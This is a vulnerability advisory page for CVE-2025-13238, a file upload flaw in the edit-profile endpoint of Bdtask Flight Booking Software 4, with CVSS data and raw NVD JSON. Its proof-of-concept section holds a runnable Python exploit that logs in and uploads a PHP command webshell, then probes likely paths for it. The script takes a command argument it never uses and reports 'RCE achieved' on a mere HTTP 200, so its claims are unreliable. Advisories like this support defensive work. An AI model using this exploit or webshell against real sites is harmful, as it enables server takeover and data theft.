Security Vulnerability Report
CVE-2025-13238 CVSS 6.3 MEDIUM

CVE-2025-13238

Published: 2025-11-16 06:15:42
Last Modified: 2026-04-29 01:00:02

Description

A weakness has been identified in Bdtask Flight Booking Software 4. The affected code is an unidentified function behind the file /agent/profile/edit on the Edit Profile page. Manipulating this request allows unrestricted file upload (CWE-434). The attack can be carried out remotely by an authenticated agent account. A public exploit is available and could be used in attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Note: the 6.3 MEDIUM figure above is the secondary (VulDB-sourced) CVSS 3.1 score. The primary NVD CVSS 3.1 entry in the raw JSON below rates the same issue 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), i.e. full confidentiality, integrity and availability impact; prioritize remediation on the higher score.

Configurations (Affected Products)

cpe:2.3:a:bdtask:flight_booking_software:4.0:*:*:*:*:*:*:* - VULNERABLE
Bdtask Flight Booking Software 4 (all known versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13238 PoC - Bdtask Flight Booking Software 4 Unrestricted File Upload # Target: /agent/profile/edit endpoint def exploit(target_url, username, password, webshell_content): """ Exploit for CVE-2025-13238 Args: target_url: Base URL of the vulnerable application username: Valid agent account username password: Password for the account webshell_content: Content of the webshell to upload """ session = requests.Session() # Step 1: Login to get authenticated session login_url = f"{target_url}/login" login_data = { 'email': username, 'password': password } try: response = session.post(login_url, data=login_data, timeout=10) if response.status_code != 200: print("[-] Login failed - check credentials") return False print("[+] Successfully authenticated") # Step 2: Upload malicious file via profile edit upload_url = f"{target_url}/agent/profile/edit" # Prepare the malicious file files = { 'profile_image': ('shell.php', webshell_content, 'application/x-php') } # Additional form data may be required data = { 'first_name': 'Test', 'last_name': 'User', 'phone': '1234567890' } response = session.post(upload_url, files=files, data=data, timeout=10) if response.status_code == 200: print("[+] File upload request sent") # Step 3: Identify uploaded file location # Common patterns: /uploads/agents/, /assets/uploads/, /media/ possible_paths = [ f"{target_url}/uploads/agents/{username}_shell.php", f"{target_url}/assets/uploads/agent_shell.php", f"{target_url}/media/agent_shell.php" ] # Step 4: Verify and execute for path in possible_paths: check_response = session.get(path, timeout=10) if check_response.status_code == 200: print(f"[+] Found uploaded shell at: {path}") print(f"[+] webshell executed - RCE achieved") return True print("[-] Exploitation failed - file may not have been uploaded") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 5: 
print("Usage: python cve_2025_13238.py <target_url> <username> <password> <command>") print("Example: python cve_2025_13238.py http://target.com [email protected] pass123 'id'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] cmd = sys.argv[4] # Simple PHP webshell webshell = f"<?php system($_GET['cmd']); ?>" exploit(target, user, pwd, webshell)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13238", "sourceIdentifier": "[email protected]", "published": "2025-11-16T06:15:42.207", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Bdtask Flight Booking Software 4. Affected by this vulnerability is an unknown functionality of the file /agent/profile/edit of the component Edit Profile Page. This manipulation causes unrestricted upload. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", 
"value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bdtask:flight_booking_software:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "3E38C34B-5FA2-4A84-BACC-A0A0436ECD7B"}]}]}], "references": [{"url": "https://github.com/4m3rr0r/PoCVulDb/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332564", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332564", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.686895", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}